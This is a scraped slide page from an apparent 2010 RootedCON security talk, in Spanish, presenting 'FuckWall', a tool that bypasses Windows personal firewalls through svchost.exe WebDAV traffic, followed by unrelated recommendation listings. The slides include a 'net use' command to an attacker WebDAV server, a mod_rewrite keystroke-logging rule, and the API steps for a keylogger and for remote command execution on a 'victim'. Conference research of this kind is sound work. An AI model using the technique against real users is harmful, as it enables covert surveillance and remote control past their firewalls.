Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]

•

1 recomendación•3,419 vistas

Este documento presenta la herramienta FuckWall, la cual permite evadir los firewalls de Windows. Aprovecha que muchos firewalls permiten comunicación sin restricciones para el proceso svchost.exe. FuckWall usa la tecnología WebDAV implementada a través de svchost.exe para establecer comunicación con un servidor y así evadir el control del firewall sobre el tráfico de salida. Ofrece funcionalidades como captura de teclado y control remoto de un sistema a través de la captura de pantalla y ejecución de comandos. Se

FuckWall

A Windows Firewalls Bypassing Tool

Congreso de Seguridad ~ Rooted CON’2010

¿Quiénes no sómos?

Investigadores buscando fallos en el protocolo DNS

Congreso de Seguridad ~ Rooted CON’2010 2

¿Quiénes no sómos?

Hackers que vieron la luz al final del tunel y
encontraron vida más allá de las consultoras...

Congreso de Seguridad ~ Rooted CON’2010 3

¿Quiénes no sómos?

Cálico Electrónico

Congreso de Seguridad ~ Rooted CON’2010 4

¿Quiénes podríamos ser?

M&M’s HackStory: Kernelpanik o Kpk fue un grupo
de hackers nacido aproximadamente en el año 2000,
según se desprende de la fecha de copyright de su
web, aún activa.

Las últimas noticias de Kernelpanik son de 2007, año
en que se supone dejó de existir.

Congreso de Seguridad ~ Rooted CON’2010 5

¿De qué vamos a hablar?

- Orígenes

- La idea aka. “El concepto es el concepto”

- PoC aka. “¿Esto realmente funciona?”

- FuckWall aka. “La herramienta”

- Demostración FuckWall aka. “Pa’habernos matao”

Congreso de Seguridad ~ Rooted CON’2010 6

FuckWall: Los orígenes (I)

• Once upon a time ...

– Éramos jóvenes, cometíamos errores y programábamos
por dinero ...

– Pero aprendimos de nuestros errores ...

Win32/Bypass: Anulando la detección de ficheros ( 2007 )

– Centrado en el bypassing de antivirus
– Rudimentario técnicamente pero “ocurrente”

Congreso de Seguridad ~ Rooted CON’2010 7

FuckWall: Los orígenes (II)

• El presente:

– Agosto de 2009: ¿Por qué no hacer lo mismo con
los firewalls?

– FuckWall: A Windows firewalls bypassing tool

– Centrado en la evasión de los firewalls  Enviar tráfico de
SALIDA sin control por parte del FW personal.
– Apoyado en una debilidad de diseño
– Desarrollo de una herramienta automatizada

Congreso de Seguridad ~ Rooted CON’2010 8

FuckWall: Fundamento funcional

• Usabilidad vs. Seguridad

• Procesos “privilegiados” en firewalls

– Por razones de “usabilidad”/”funcionalidad” numerosas compañías
firewalls deciden “arbitrariamente” permitir libremente la comunicación
de tráfico de salida a determinados procesos.

Congreso de Seguridad ~ Rooted CON’2010 9

FuckWall: Fundamento funcional

• OutPost:

Congreso de Seguridad ~ Rooted CON’2010 1
0

FuckWall: Fundamento funcional

• Zone Alarm:

Congreso de Seguridad ~ Rooted CON’2010 1
1

FuckWall: Fundamento funcional

Y así hasta 8 firewalls personales más ...

Se libró ( si la memoria no nos falla ): Jetico

Congreso de Seguridad ~ Rooted CON’2010 1
2

FuckWall: La idea

• Una vieja idea:
– ¿Qué sucedería si desde el espacio de usuario
pudiesemos controlar uno de esos procesos
“privilegiados” por los firewalls?

• Se ha realizado anteriormente:
– Hooking a una aplicación “privilegiada”
– Más usual: hooking del navegador

www.securitybydefault.com/2009/09/troyanos-titiriteros.html

Congreso de Seguridad ~ Rooted CON’2010 1
3

FuckWall: Revisando la idea

• Los problemas del hooking:
– Técnica “relativamente” difundida e invasiva.
– Los antivirus y los firewalls detectan intentos de
hooking sobre aplicaciones, alertando al usuario
de contenido vírico y/o peligroso.

• La idea revisada:
– ¿Y si fuese posible desde el espacio de usuario
interactuar directamente con un proceso
privilegiado sin usar hooking?
Congreso de Seguridad ~ Rooted CON’2010 1
4

FuckWall: Construyendo la idea (I)

• El proceso SVCHOST.EXE

– ¿Qué es el proceso SVCHOST.EXE?

A grosso modo es la “idea” de Microsoft para
ejecutar cualquier servicio que esté contenido en
un DLL

Congreso de Seguridad ~ Rooted CON’2010 1
5

FuckWall: Construyendo la idea (I)

• El proceso SVCHOST.EXE

– ¿Para qué se usa SVCHOST.EXE?

• DNS
• uPNP
• Tráfico ICMP
• Web Folders
• Y un largo etc ...

Congreso de Seguridad ~ Rooted CON’2010 1
6

FuckWall: Construyendo la idea (II)

• La gran pregunta:

¿Es posible manipular svchost.exe
desde espacio de usuario y sin necesidad de
ningún tipo de privilegio especial generando
tráfico de salida dirigido?

Congreso de Seguridad ~ Rooted CON’2010 1
7

FuckWall: Construyendo la idea (III)

- A nosotros se nos ocurre:

La tecnología de Microsoft Windows denominada
“carpetas web” / “web folders” hace uso de
svchost.exe para su comunicación

» No requiere privilegios

» Permite comunicación WebDAV

Congreso de Seguridad ~ Rooted CON’2010 1
8

FuckWALL: Proof of Concept
• ¿Qué hace falta para evadir el control de tráfico
saliente en aproximadamente el 90% de los
firewalls personales de windows?

– Un servidor Apache con el módulo de WebDAV
habilitado para compartir un recurso.

– Escribir desde el equipo del que queramos
bypassear su firewal:

net use Z: http://servidordav/recurso
Congreso de Seguridad ~ Rooted CON’2010 1
9

FuckWALL: Proof of Concept (II)

DEMOSTRACIÓN I

PoC

Congreso de Seguridad ~ Rooted CON’2010 2
0

FuckWALL: La Herramienta (I)

• FuckWall es una herramienta cliente-servidor
que se apoya en el concepto anteriormente
mostrado de hacer uso de la comunicación
WebDAV, implementada a través del proceso
svchost.exe, para evadir las medidas de
seguridad sobre el tráfico saliente impuestas
por firewalls personales en entornos Microsoft
Windows.

Congreso de Seguridad ~ Rooted CON’2010 2
1

FuckWALL: La Herramienta (II)

• Funcionalidades:

• Captura de Teclado: Comunicación unidireccional hacia el
servidor de las teclas pulsadas en la máquina cliente (víctima)

• Control Remoto:

– Captura de pantalla: Comunicación bidireccional para envío al
servidor de la pantalla capturada ante cada click del ratón en el
equipo cliente (victima)

– Ejecución de comandos: Comunicación bidireccional para la
ejecución de comandos en la máquina cliente (víctima) y envío
de resultados al servidor.
Congreso de Seguridad ~ Rooted CON’2010 2
2

FuckWALL: Función Keylogger

• Cada pulsación de tecla genera en el cliente
un intento por montar un recurso compartido
equivalente a la tecla pulsada.

• El servidor rechaza _siempre_ este intento de
montaje, registrando la pulsación y la
aplicación en la que se ha ejecutado.

Congreso de Seguridad ~ Rooted CON’2010 2
3

FuckWALL: Función Keylogger

• Cliente:
– Paso 1: SetWindowHookEx  Tecla pulsada.

– Paso 2: WNetAddConnection2  tecla.app.kpk

• Servidor (mod_rewrite):
– Paso 3: Rewriterule ^(.*).(.*).kpk$ logger.php?app=
$1&key=$2  Registro

– Paso 4: header('HTTP/1.1 404 Not Found');  Error

Congreso de Seguridad ~ Rooted CON’2010 2
4

FuckWALL: Proof of Concept (II)

DEMOSTRACIÓN II

FuckWall
Captura de Teclado

Congreso de Seguridad ~ Rooted CON’2010 2
5

FuckWALL: Función Control Remoto

• El cliente se conecta satisfactoriamente al recurso compartido
por el servidor.

• El servidor para esta funcionalidad hace uso del módulo
mod_dav.

• El cliente hará envíos de las capturas de pantalla ante cada
click del usuario.

• El cliente se descarga del servidor la lista de comandos a
ejecutar, los ejecuta y devuelve el resultado.

Congreso de Seguridad ~ Rooted CON’2010 2
6

FuckWALL: Función Control Remoto

• Paso 1: WNetAddConnection2  Recurso Netbios
SIN Unidad*

• Paso 2: SetWindowHookEx  Captura de Pantalla

• Paso 3: CreateFile  Copiar datos al Servidor

Congreso de Seguridad ~ Rooted CON’2010 2
7

FuckWALL: Proof of Concept (II)

DEMOSTRACIÓN III

FuckWall
Control Remoto

Congreso de Seguridad ~ Rooted CON’2010 2
8

FuckWALL: Conclusiones

• Fácil evasión del firewall

• Minimos requerimientos técnicos

• Llamadas básicas al API

• Debilidad basada en la confianza en
determinados procesos vitales del sistema.

Congreso de Seguridad ~ Rooted CON’2010 2
9

¡GRACIAS POR AGUANTAR EN LA SILLA!

Autores ( en escricto orden de nacimiento ):

Antonio López – alopmun@gmail.com

Javier Medina – medina.fjavier@gmail.com
Congreso de Seguridad ~ Rooted CON’2010

Recomendados

VIRUS INFORMATICOS

VIRUS INFORMATICOS

VIRUS INFORMATICOS

El documento describe los diferentes tipos de virus informáticos, cómo se transmiten y las medidas para prevenirlos. Explica que un virus informático es un programa que se puede autoreproducir e infectar otros programas, transmitiéndose de computadora a computadora y causando daños. También describe los diferentes tipos de antivirus y sus funciones para detectar, desinfectar y prevenir infecciones por virus.

Crackeando redes wep

Crackeando redes wep

Crackeando redes wep

Emilson Papo-rriarte

Este documento proporciona instrucciones para crackear redes WEP mediante el uso de herramientas como airodump-ng, aireplay-ng y aircrack-ng. Explica cómo poner la tarjeta inalámbrica en modo monitor para capturar paquetes de la red, usar aireplay-ng para inyectar tráfico y obtener más vectores de inicialización, y luego usar aircrack-ng en los paquetes capturados para descifrar la clave WEP.

David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]

David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]

David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]

Este documento presenta una introducción a los rootkits y sus tendencias a lo largo de los años, incluyendo técnicas como modificar binarios del sistema, inyección de código en el kernel y en ejecución, y eludir detección. También describe herramientas como Unhide y UnhideNX para detectar rootkits ocultando procesos o archivos mediante la comparación de datos de diferentes fuentes. Además, propone contramedidas como preload, kernel.yama.ptrace_scope, y PydeAPI para auditar la integridad del sistema y detectar in

Zeus-R-uS

Santiago Vicente

Como hacer-un-cambio-de-firmwere-en-un-router-linksys-wrt54 g-y-gl

Como hacer-un-cambio-de-firmwere-en-un-router-linksys-wrt54 g-y-gl

Como hacer-un-cambio-de-firmwere-en-un-router-linksys-wrt54 g-y-gl

Norbert R Ibañez

Este documento explica cómo realizar una actualización de firmware en un router Linksys WRT54G y GL. Primero, se debe descargar el firmware DD-WRT de los sitios web enumerados y guardarlo en la computadora. Luego, a través del navegador web interno del router, se selecciona el firmware descargado y se hace clic en el botón de actualización para cambiar el firmware de fábrica por DD-WRT. Finalmente, el router se reiniciará automáticamente una vez completada la actualización.

Deep dive into digital forensics and incident response - (ISC)2 latam congres...

Deep dive into digital forensics and incident response - (ISC)2 latam congres...

Deep dive into digital forensics and incident response - (ISC)2 latam congres...

Hack&Beers Cadiz Análisis de Malware Cuckoo Sandbox

Hack&Beers Cadiz Análisis de Malware Cuckoo Sandbox

Hack&Beers Cadiz Análisis de Malware Cuckoo Sandbox

Mario Alberto Parra Alonso

Presentacion re y_des_09072003

Presentacion re y_des_09072003

Presentacion re y_des_09072003

Alonso Caballero

Este documento trata sobre seguridad y hacking en Linux. Explica conceptos clave de seguridad como proteger software, hardware y datos. Luego detalla métodos comunes de seguridad en Linux como definir servicios necesarios, usar herramientas de bastionado, antivirus, proxy, firewall e IDS. Finalmente, cubre temas de hacking en Linux como obtener información de un sistema mediante herramientas y explotar vulnerabilidades para elevar privilegios.

Recomendados

VIRUS INFORMATICOS

VIRUS INFORMATICOS

VIRUS INFORMATICOS

El documento describe los diferentes tipos de virus informáticos, cómo se transmiten y las medidas para prevenirlos. Explica que un virus informático es un programa que se puede autoreproducir e infectar otros programas, transmitiéndose de computadora a computadora y causando daños. También describe los diferentes tipos de antivirus y sus funciones para detectar, desinfectar y prevenir infecciones por virus.

Crackeando redes wep

Crackeando redes wep

Crackeando redes wep

Emilson Papo-rriarte

Este documento proporciona instrucciones para crackear redes WEP mediante el uso de herramientas como airodump-ng, aireplay-ng y aircrack-ng. Explica cómo poner la tarjeta inalámbrica en modo monitor para capturar paquetes de la red, usar aireplay-ng para inyectar tráfico y obtener más vectores de inicialización, y luego usar aircrack-ng en los paquetes capturados para descifrar la clave WEP.

David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]

David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]

David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]

Este documento presenta una introducción a los rootkits y sus tendencias a lo largo de los años, incluyendo técnicas como modificar binarios del sistema, inyección de código en el kernel y en ejecución, y eludir detección. También describe herramientas como Unhide y UnhideNX para detectar rootkits ocultando procesos o archivos mediante la comparación de datos de diferentes fuentes. Además, propone contramedidas como preload, kernel.yama.ptrace_scope, y PydeAPI para auditar la integridad del sistema y detectar in

Zeus-R-uS

Santiago Vicente

Como hacer-un-cambio-de-firmwere-en-un-router-linksys-wrt54 g-y-gl

Como hacer-un-cambio-de-firmwere-en-un-router-linksys-wrt54 g-y-gl

Como hacer-un-cambio-de-firmwere-en-un-router-linksys-wrt54 g-y-gl

Norbert R Ibañez

Este documento explica cómo realizar una actualización de firmware en un router Linksys WRT54G y GL. Primero, se debe descargar el firmware DD-WRT de los sitios web enumerados y guardarlo en la computadora. Luego, a través del navegador web interno del router, se selecciona el firmware descargado y se hace clic en el botón de actualización para cambiar el firmware de fábrica por DD-WRT. Finalmente, el router se reiniciará automáticamente una vez completada la actualización.

Deep dive into digital forensics and incident response - (ISC)2 latam congres...

Deep dive into digital forensics and incident response - (ISC)2 latam congres...

Deep dive into digital forensics and incident response - (ISC)2 latam congres...

Hack&Beers Cadiz Análisis de Malware Cuckoo Sandbox

Hack&Beers Cadiz Análisis de Malware Cuckoo Sandbox

Hack&Beers Cadiz Análisis de Malware Cuckoo Sandbox

Mario Alberto Parra Alonso

Presentacion re y_des_09072003

Presentacion re y_des_09072003

Presentacion re y_des_09072003

Alonso Caballero

Este documento trata sobre seguridad y hacking en Linux. Explica conceptos clave de seguridad como proteger software, hardware y datos. Luego detalla métodos comunes de seguridad en Linux como definir servicios necesarios, usar herramientas de bastionado, antivirus, proxy, firewall e IDS. Finalmente, cubre temas de hacking en Linux como obtener información de un sistema mediante herramientas y explotar vulnerabilidades para elevar privilegios.

Kali linux

andresaguilar06

Kali linux guia español

Kali linux guia español

Kali linux guia español

Homero de la Barra

Este documento presenta un curso sobre hacking ético con Kali Linux. Describe al instructor Alonso Eduardo Caballero Quezada y su experiencia. El temario incluye una introducción a Kali Linux, metodología de pruebas de penetración, máquinas virtuales vulnerables, capturar información, enumerar objetivos y explotar vulnerabilidades. También se proporciona información sobre la descarga e instalación de Kali Linux y máquinas virtuales vulnerables como Metasploitable para practicar técnicas de hacking ético.

Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]

Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]

Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]

El documento describe el enfoque LNX IRTool para la adquisición de evidencia digital forense en sistemas Linux potencialmente comprometidos. Incluye pasos de preparación como la creación de puntos de montaje, y la ejecución de scripts que realizan tareas como el dump de memoria, extracción de artefactos de sistema e información de usuarios, red y procesos, y la generación de un timeline de sistema de archivos.

Docker para integradores Asterisk

Docker para integradores Asterisk

Docker para integradores Asterisk

Presentación del Webinar desarrollado el 18 de Diciembre de 2020. Enlace al webinar: https://youtu.be/Vu0xj2vhsb4 Docker es un proyecto de código abierto que automatiza el despliegue de aplicaciones dentro de contenedores de software, proporcionando una capa adicional de abstracción y automatización de virtualización de aplicaciones en múltiples sistemas operativos. Temas a desarrollar: - Breve introducción a Docker - Construyendo nuestra primera imagen Asterisk-Docker - Lanzando nuestro contenedor Asterisk - Docker Compose: Asterisk + MariaDB (CDR) - Ejemplo de una Aplicación VoIP real: - OMniLeads “dockerizado” corriendo sobre FreePBX / Issabel Panelista invitado: Fabián Pignataro, CTO OMniLeads

Taller instalacion Kali Linux

Taller instalacion Kali Linux

Taller instalacion Kali Linux

Marlon Altamirano

Seguridad en Windows Mobile

Seguridad en Windows Mobile

Seguridad en Windows Mobile

Conferencias FIST

Seguridad so pi_2011

Seguridad so pi_2011

Seguridad so pi_2011

Jacobo Avariento

Presentacion kali linux

Presentacion kali linux

Presentacion kali linux

1. Kali Linux es un sistema operativo diseñado para mejorar la seguridad informática y realizar pruebas de penetración en redes inalámbricas. 2. Incluye más de 300 herramientas de pruebas de penetración como Wireshark, Metasploit y aircrack-ng. 3. Se requiere un mínimo de 512 MB de RAM, 8 GB de espacio en disco y soporte para CD/DVD para la instalación, la cual sigue pasos como seleccionar idioma, particionar disco y configurar espejos de red.

Virus

Este documento trata sobre virus informáticos. Explica que los primeros virus surgieron en los años 70 y que su uso se expandió en 1984. Define qué son los virus, sus características y tipos principales como virus residentes, de acción directa y de sobreescritura. También describe troyanos y spyware, y ofrece consejos para prevenir infecciones como mantener software actualizado y evitar descargar archivos de fuentes desconocidas.

seguridadinformática

seguridadinformática

seguridadinformática

silviafdezelespi

Este documento define y explica los virus informáticos, troyanos y antivirus. Define un virus como un programa malicioso que infecta otros archivos para propagarse o dañar el sistema. Explica cómo se propagan los virus y los diferentes tipos como residentes, encriptados y de boot. También describe los troyanos y su función de permitir acceso no autorizado. Finalmente, define los antivirus como programas que protegen contra virus, worms y otros invasores, previniendo daños como la pérdida de datos o desinstalación del sistema operativo.

Estrategias de Ataque y Defensa

Estrategias de Ataque y Defensa

Estrategias de Ataque y Defensa

Securinf.com Seguridad Informatica - Tecnoweb2.com

Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]

Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]

Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]

Este documento presenta osquery, una herramienta de detección de amenazas a escala que utiliza SQL para explorar sistemas operativos. Explica cómo osquery puede utilizarse para monitorizar hosts corporativos, recopilar datos de seguridad y correlacionarlos. Detalla el uso de osqueryi, osqueryd, tablas, consultas programadas, paquetes de consultas y el punto final TLS remoto para la gestión centralizada de osquery.

Virus

Fedora Security LAB

Fedora Security LAB

Fedora Security LAB

El legado economico de allende

El legado economico de allende

El legado economico de allende

WALTERIO BARRA C / COMPETENZZA CONSULTORES

El documento analiza la propuesta económica de Allende y la renta de los recursos naturales en Chile. Argumenta que la propuesta de Allende era coherente con su época y buscaba un modelo más equitativo, mientras que el modelo actual entrega la renta de los recursos a grupos privados sin lograr un verdadero desarrollo. Propone que el Estado se apropie de la renta para invertir en capital humano y diversificar la economía.

CICLOS

Ler e escrever na web 2.0 (ii)

Ler e escrever na web 2.0 (ii)

Ler e escrever na web 2.0 (ii)

Relatório " A Cidade constitucional: Capital da República IX"

Relatório " A Cidade constitucional: Capital da República IX"

Relatório " A Cidade constitucional: Capital da República IX"

O documento resume as atividades de uma semana de estudantes universitários em Brasília como parte do projeto "A Cidade Constitucional: Capital da República", incluindo visitas a órgãos governamentais, palestras sobre educação fiscal, saúde pública e participação social. Os alunos ficaram alojados na ESAF e conheceram locais como o Palácio da Alvorada, o Congresso Nacional e a Receita Federal.

Guadalupe Lopez Hernandez Vid

Guadalupe Lopez Hernandez Vid

Guadalupe Lopez Hernandez Vid

Este documento resume la vida y obra de la escritora estadounidense Stephenie Meyer. Detalla que nació en 1973 en Connecticut y se graduó en Literatura Inglesa. Se casó en 1994 y tiene tres hijos. Es más conocida por su popular saga Crepúsculo, compuesta por cinco libros publicados entre 2005 y 2008. Explica brevemente la trama de New Moon, su segunda novela de la saga. Finalmente, reconoce a Meyer como una de las escritoras más vendidas del siglo XXI gracias al éxito mundial de sus novelas sobre

Pacto De Comvivencia

Pacto De Comvivencia

Pacto De Comvivencia

Este documento presenta un pacto de convivencia para estudiantes de grado 9C en el año 2010. El pacto incluye 14 reglas como llegar a tiempo a la sala de computadores, usar el uniforme escolar correcto, ubicarse en el computador asignado, no comer en el aula, escuchar atentamente las instrucciones de los profesores, hacer un buen uso de Internet, presentar trabajos de forma oportuna y organizada, y solicitar ayuda solo cuando sea necesario.

Diapositiva de titulo

Diapositiva de titulo

Diapositiva de titulo

Curso linux clase_2_2012

Curso linux clase_2_2012

Curso linux clase_2_2012

Dario Villafañe

Este documento presenta los temas a desarrollar en un curso introductorio de Linux para sistemas operativos en la Universidad Tecnológica Nacional Facultad Regional Tucumán. Los temas incluyen la instalación de una máquina virtual, inicio de sesión en Linux, estructura de archivos, editor de texto VIM, compilación de programas en C, configuración de red e IP, cliente SSH y conceptos de FTP.

Más contenido relacionado

La actualidad más candente

Kali linux

andresaguilar06

Kali linux guia español

Kali linux guia español

Kali linux guia español

Homero de la Barra

Este documento presenta un curso sobre hacking ético con Kali Linux. Describe al instructor Alonso Eduardo Caballero Quezada y su experiencia. El temario incluye una introducción a Kali Linux, metodología de pruebas de penetración, máquinas virtuales vulnerables, capturar información, enumerar objetivos y explotar vulnerabilidades. También se proporciona información sobre la descarga e instalación de Kali Linux y máquinas virtuales vulnerables como Metasploitable para practicar técnicas de hacking ético.

Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]

Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]

Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]

El documento describe el enfoque LNX IRTool para la adquisición de evidencia digital forense en sistemas Linux potencialmente comprometidos. Incluye pasos de preparación como la creación de puntos de montaje, y la ejecución de scripts que realizan tareas como el dump de memoria, extracción de artefactos de sistema e información de usuarios, red y procesos, y la generación de un timeline de sistema de archivos.

Docker para integradores Asterisk

Docker para integradores Asterisk

Docker para integradores Asterisk

Presentación del Webinar desarrollado el 18 de Diciembre de 2020. Enlace al webinar: https://youtu.be/Vu0xj2vhsb4 Docker es un proyecto de código abierto que automatiza el despliegue de aplicaciones dentro de contenedores de software, proporcionando una capa adicional de abstracción y automatización de virtualización de aplicaciones en múltiples sistemas operativos. Temas a desarrollar: - Breve introducción a Docker - Construyendo nuestra primera imagen Asterisk-Docker - Lanzando nuestro contenedor Asterisk - Docker Compose: Asterisk + MariaDB (CDR) - Ejemplo de una Aplicación VoIP real: - OMniLeads “dockerizado” corriendo sobre FreePBX / Issabel Panelista invitado: Fabián Pignataro, CTO OMniLeads

Taller instalacion Kali Linux

Taller instalacion Kali Linux

Taller instalacion Kali Linux

Marlon Altamirano

Seguridad en Windows Mobile

Seguridad en Windows Mobile

Seguridad en Windows Mobile

Conferencias FIST

Seguridad so pi_2011

Seguridad so pi_2011

Seguridad so pi_2011

Jacobo Avariento

Presentacion kali linux

Presentacion kali linux

Presentacion kali linux

1. Kali Linux es un sistema operativo diseñado para mejorar la seguridad informática y realizar pruebas de penetración en redes inalámbricas. 2. Incluye más de 300 herramientas de pruebas de penetración como Wireshark, Metasploit y aircrack-ng. 3. Se requiere un mínimo de 512 MB de RAM, 8 GB de espacio en disco y soporte para CD/DVD para la instalación, la cual sigue pasos como seleccionar idioma, particionar disco y configurar espejos de red.

Virus

Este documento trata sobre virus informáticos. Explica que los primeros virus surgieron en los años 70 y que su uso se expandió en 1984. Define qué son los virus, sus características y tipos principales como virus residentes, de acción directa y de sobreescritura. También describe troyanos y spyware, y ofrece consejos para prevenir infecciones como mantener software actualizado y evitar descargar archivos de fuentes desconocidas.

seguridadinformática

seguridadinformática

seguridadinformática

silviafdezelespi

Este documento define y explica los virus informáticos, troyanos y antivirus. Define un virus como un programa malicioso que infecta otros archivos para propagarse o dañar el sistema. Explica cómo se propagan los virus y los diferentes tipos como residentes, encriptados y de boot. También describe los troyanos y su función de permitir acceso no autorizado. Finalmente, define los antivirus como programas que protegen contra virus, worms y otros invasores, previniendo daños como la pérdida de datos o desinstalación del sistema operativo.

Estrategias de Ataque y Defensa

Estrategias de Ataque y Defensa

Estrategias de Ataque y Defensa

Securinf.com Seguridad Informatica - Tecnoweb2.com

Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]

Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]

Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]

Este documento presenta osquery, una herramienta de detección de amenazas a escala que utiliza SQL para explorar sistemas operativos. Explica cómo osquery puede utilizarse para monitorizar hosts corporativos, recopilar datos de seguridad y correlacionarlos. Detalla el uso de osqueryi, osqueryd, tablas, consultas programadas, paquetes de consultas y el punto final TLS remoto para la gestión centralizada de osquery.

Virus

Fedora Security LAB

Fedora Security LAB

Fedora Security LAB

La actualidad más candente (14)

Kali linux

Kali linux guia español

Kali linux guia español

Kali linux guia español

Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]

Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]

Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]

Docker para integradores Asterisk

Docker para integradores Asterisk

Docker para integradores Asterisk

Taller instalacion Kali Linux

Taller instalacion Kali Linux

Taller instalacion Kali Linux

Seguridad en Windows Mobile

Seguridad en Windows Mobile

Seguridad en Windows Mobile

Seguridad so pi_2011

Seguridad so pi_2011

Seguridad so pi_2011

Presentacion kali linux

Presentacion kali linux

Presentacion kali linux

Virus

seguridadinformática

seguridadinformática

seguridadinformática

Estrategias de Ataque y Defensa

Estrategias de Ataque y Defensa

Estrategias de Ataque y Defensa

Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]

Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]

Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]

Virus

Fedora Security LAB

Fedora Security LAB

Fedora Security LAB

Destacado

El legado economico de allende

El legado economico de allende

El legado economico de allende

WALTERIO BARRA C / COMPETENZZA CONSULTORES

El documento analiza la propuesta económica de Allende y la renta de los recursos naturales en Chile. Argumenta que la propuesta de Allende era coherente con su época y buscaba un modelo más equitativo, mientras que el modelo actual entrega la renta de los recursos a grupos privados sin lograr un verdadero desarrollo. Propone que el Estado se apropie de la renta para invertir en capital humano y diversificar la economía.

CICLOS

Ler e escrever na web 2.0 (ii)

Ler e escrever na web 2.0 (ii)

Ler e escrever na web 2.0 (ii)

Relatório " A Cidade constitucional: Capital da República IX"

Relatório " A Cidade constitucional: Capital da República IX"

Relatório " A Cidade constitucional: Capital da República IX"

O documento resume as atividades de uma semana de estudantes universitários em Brasília como parte do projeto "A Cidade Constitucional: Capital da República", incluindo visitas a órgãos governamentais, palestras sobre educação fiscal, saúde pública e participação social. Os alunos ficaram alojados na ESAF e conheceram locais como o Palácio da Alvorada, o Congresso Nacional e a Receita Federal.

Guadalupe Lopez Hernandez Vid

Guadalupe Lopez Hernandez Vid

Guadalupe Lopez Hernandez Vid

Este documento resume la vida y obra de la escritora estadounidense Stephenie Meyer. Detalla que nació en 1973 en Connecticut y se graduó en Literatura Inglesa. Se casó en 1994 y tiene tres hijos. Es más conocida por su popular saga Crepúsculo, compuesta por cinco libros publicados entre 2005 y 2008. Explica brevemente la trama de New Moon, su segunda novela de la saga. Finalmente, reconoce a Meyer como una de las escritoras más vendidas del siglo XXI gracias al éxito mundial de sus novelas sobre

Pacto De Comvivencia

Pacto De Comvivencia

Pacto De Comvivencia

Este documento presenta un pacto de convivencia para estudiantes de grado 9C en el año 2010. El pacto incluye 14 reglas como llegar a tiempo a la sala de computadores, usar el uniforme escolar correcto, ubicarse en el computador asignado, no comer en el aula, escuchar atentamente las instrucciones de los profesores, hacer un buen uso de Internet, presentar trabajos de forma oportuna y organizada, y solicitar ayuda solo cuando sea necesario.

Diapositiva de titulo

Diapositiva de titulo

Diapositiva de titulo

Destacado (7)

El legado economico de allende

El legado economico de allende

El legado economico de allende

CICLOS

Ler e escrever na web 2.0 (ii)

Ler e escrever na web 2.0 (ii)

Ler e escrever na web 2.0 (ii)

Relatório " A Cidade constitucional: Capital da República IX"

Relatório " A Cidade constitucional: Capital da República IX"

Relatório " A Cidade constitucional: Capital da República IX"

Guadalupe Lopez Hernandez Vid

Guadalupe Lopez Hernandez Vid

Guadalupe Lopez Hernandez Vid

Pacto De Comvivencia

Pacto De Comvivencia

Pacto De Comvivencia

Diapositiva de titulo

Diapositiva de titulo

Diapositiva de titulo

Similar a Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]

Curso linux clase_2_2012

Curso linux clase_2_2012

Curso linux clase_2_2012

Dario Villafañe

Este documento presenta los temas a desarrollar en un curso introductorio de Linux para sistemas operativos en la Universidad Tecnológica Nacional Facultad Regional Tucumán. Los temas incluyen la instalación de una máquina virtual, inicio de sesión en Linux, estructura de archivos, editor de texto VIM, compilación de programas en C, configuración de red e IP, cliente SSH y conceptos de FTP.

David López Paz - Global Warfare [RootedCON 2011]

David López Paz - Global Warfare [RootedCON 2011]

David López Paz - Global Warfare [RootedCON 2011]

Este documento describe el uso de Internet como un medio de guerra y conflictos cibernéticos. Explica cómo ataques como Stuxnet y GhostNet han explotado vulnerabilidades en sistemas de Windows, bases de datos y software de servidor para extraer inteligencia o causar daños. También presenta una herramienta llamada Hookle que ha escaneado más de 14 millones de hosts en Internet para identificar sistemas vulnerables como impresoras, cámaras web, servidores IIS y JBoss que podrían ser objetivos de ataques ciberné

VC4NM73 EQ#4-W8,U5,T4

VC4NM73 EQ#4-W8,U5,T4

VC4NM73 EQ#4-W8,U5,T4

Este documento discute las vulnerabilidades de Internet Explorer y los puertos abiertos. Explica que Internet Explorer tuvo muchas vulnerabilidades en versiones anteriores que permitieron la propagación de software malicioso. También describe cómo los puertos abiertos pueden representar riesgos de seguridad si no se protegen adecuadamente, ya que permiten el acceso no autorizado a sistemas y recursos. Finalmente, ofrece recomendaciones sobre mantener los sistemas actualizados y usar firewalls para mitigar estas vulnerabilidades.

Vc4 nm73 eq#4-w8,u5,t4

Vc4 nm73 eq#4-w8,u5,t4

Vc4 nm73 eq#4-w8,u5,t4

Este documento resume varias vulnerabilidades relacionadas con Internet Explorer, el protocolo FTP y los puertos abiertos. Explica que Internet Explorer tuvo muchas vulnerabilidades debido a su popularidad, y que Microsoft ha tratado de corregirlas lanzando actualizaciones periódicas. También describe una vulnerabilidad en el servidor FTP WU-FTPD que permitía la ejecución remota de código como root. Finalmente, señala que tener muchos puertos abiertos expone a los sistemas a ataques de escaneo de puertos.

Wi Fi Slax 3.1 Fist Conference

Wi Fi Slax 3.1 Fist Conference

Wi Fi Slax 3.1 Fist Conference

